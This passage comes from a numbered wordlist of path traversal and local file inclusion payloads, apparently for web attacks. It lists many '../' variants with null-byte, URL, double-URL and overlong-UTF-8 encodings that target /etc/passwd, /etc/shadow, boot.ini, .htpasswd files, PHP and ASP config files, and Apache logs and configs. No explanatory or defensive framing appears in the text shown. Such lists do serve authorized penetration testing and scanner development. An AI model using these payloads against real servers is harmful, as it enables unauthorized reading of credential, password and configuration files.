../../../../../../../../../../etc/passwd 26 | ../../../../../../../../../../etc/passwd%00 27 | ../../../../../../../../../../../etc/passwd 28 | ../../../../../../../../../../../etc/passwd%00 29 | ../../../../../../../../../../../../etc/passwd 30 | ../../../../../../../../../../../../etc/passwd%00 31 | ../../../../../../../../../../../../../etc/passwd 32 | ../../../../../../../../../../../../../etc/passwd%00 33 | ../../../../../../../../../../../../../../etc/passwd 34 | ../../../../../../../../../../../../../../etc/passwd%00 35 | ../../../../../../../../../../../../../../../etc/passwd 36 | ../../../../../../../../../../../../../../../etc/passwd%00 37 | ../../../../../../../../../../../../../../../../etc/passwd 38 | ../../../../../../../../../../../../../../../../etc/passwd%00 39 | ../../../../../../../../../../../../../../../../../etc/passwd 40 | ../../../../../../../../../../../../../../../../../etc/passwd%00 41 | ../../../../../../../../../../../../../../../../../../etc/passwd 42 | ../../../../../../../../../../../../../../../../../../etc/passwd%00 43 | ../../../../../../../../../../../../../../../../../../../etc/passwd 44 | ../../../../../../../../../../../../../../../../../../../etc/passwd%00 45 | ../../../../../../../../../../../../../../../../../../../../etc/passwd 46 | ../../../../../../../../../../../../../../../../../../../../etc/passwd%00 47 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd 48 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 49 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd 50 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 51 | ../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 52 | ../../../../../../etc/passwd&=%3C%3C%3C%3C 53 | ../../../administrator/inbox 54 | ../../../../../../../dev 55 | .htpasswd 56 | passwd 57 | passwd.dat 58 | pass.dat 59 | .htpasswd 60 | /.htpasswd 61 | 
../.htpasswd 62 | .passwd 63 | /.passwd 64 | ../.passwd 65 | .pass 66 | ../.pass 67 | members/.htpasswd 68 | member/.htpasswd 69 | user/.htpasswd 70 | users/.htpasswd 71 | root/.htpasswd 72 | db.php 73 | data.php 74 | database.asp 75 | database.js 76 | database.php 77 | dbase.php a 78 | admin/access_log 79 | ../users.db.php 80 | users.db.php 81 | /core/config.php 82 | config.php 83 | config.js 84 | ../config.js 85 | config.asp 86 | ../config.asp 87 | _config.php 88 | ../_config.php 89 | ../_config.php%00 90 | ../config.php 91 | config.inc.php 92 | ../config.inc.php 93 | /config.asp 94 | ../config.asp 95 | /../../../../pswd 96 | /admin/install.php 97 | ../install.php 98 | install.php 99 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 100 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow 101 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd 102 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow 103 | ..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed 104 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini 105 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 106 | /..\..\..\..\..\..\winnt\win.ini 107 | ../../windows/win.ini 108 | ..//..//..//..//..//boot.ini 109 | ..\../..\../boot.ini 110 | ..\../..\../..\../..\../boot.ini 111 | \…..\\\…..\\\…..\\\ 112 | =3D “/..” . “%2f.. 
113 | d:\AppServ\MySQL 114 | c:\AppServ\MySQL 115 | c:WINDOWS/system32/ 116 | /C:\Program Files\ 117 | /D:\Program Files\ 118 | /C:/inetpub/ftproot/ 119 | /boot/grub/grub.conf 120 | /proc/interrupts 121 | /proc/cpuinfo 122 | /proc/meminfo 123 | ../apache/logs/error.log 124 | ../apache/logs/access.log 125 | ../../apache/logs/error.log 126 | ../../apache/logs/access.log 127 | ../../../apache/logs/error.log 128 | ../../../apache/logs/access.log 129 | ../../../../../../../etc/httpd/logs/acces_log 130 | ../../../../../../../etc/httpd/logs/acces.log 131 | ../../../../../../../etc/httpd/logs/error_log 132 | ../../../../../../../etc/httpd/logs/error.log 133 | ../../../../../../../var/www/logs/access_log 134 | ../../../../../../../var/www/logs/access.log 135 | ../../../../../../../usr/local/apache/logs/access_ log 136 | ../../../../../../../usr/local/apache/logs/access. log 137 | ../../../../../../../var/log/apache/access_log 138 | ../../../../../../../var/log/apache2/access_log 139 | ../../../../../../../var/log/apache/access.log 140 | ../../../../../../../var/log/apache2/access.log 141 | ../../../../../../../var/log/access_log 142 | ../../../../../../../var/log/access.log 143 | ../../../../../../../var/www/logs/error_log 144 | ../../../../../../../var/www/logs/error.log 145 | ../../../../../../../usr/local/apache/logs/error_l og 146 | ../../../../../../../usr/local/apache/logs/error.l og 147 | ../../../../../../../var/log/apache/error_log 148 | ../../../../../../../var/log/apache2/error_log 149 | ../../../../../../../var/log/apache/error.log 150 | ../../../../../../../var/log/apache2/error.log 151 | ../../../../../../../var/log/error_log 152 | ../../../../../../../var/log/error.log 153 | /etc/init.d/apache 154 | /etc/init.d/apache2 155 | /etc/httpd/httpd.conf 156 | /etc/apache/apache.conf 157 | /etc/apache/httpd.conf 158 | /etc/apache2/apache2.conf 159 | /etc/apache2/httpd.conf 160 | /usr/local/apache2/conf/httpd.conf 161 | /usr/local/apache/conf/httpd.conf 162 | 
/opt/apache/conf/httpd.conf 163 | /home/apache/httpd.conf 164 | /home/apache/conf/httpd.conf 165 | /etc/apache2/sites-available/default 166 | /etc/apache2/vhosts.d/default_vhost.include 167 | /etc/passwd 168 | /etc/shadow 169 | /etc/group 170 | /etc/security/group 171 | /etc/security/passwd 172 | /etc/security/user 173 | /etc/security/environ 174 | /etc/security/limits 175 | /usr/lib/security/mkuser.default/etc/master.passwd 176 | ....//....//....//etc/passwd 177 | ....\/....\/....\/etc/passwd 178 | %5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd 179 | ..%252f..%252f..%252fetc%252fpasswd 180 | ..%c0%af..%c0%af..%c0%afetc%c0%afpasswd 181 | %252e%252e%252fetc%252fpasswd 182 | %252e%252e%252fetc%252fpasswd%00 183 | ....//....//etc/passwd 184 | ..///////..////..//////etc/passwd 185 | /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd 186 | /var/www/../../etc/passwd 187 | %25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66etc/passwd 188 | ../../../etc/passwd%00.jpg 189 | ....//....//....//etc/passwd 190 | --------------------------------------------------------------------------------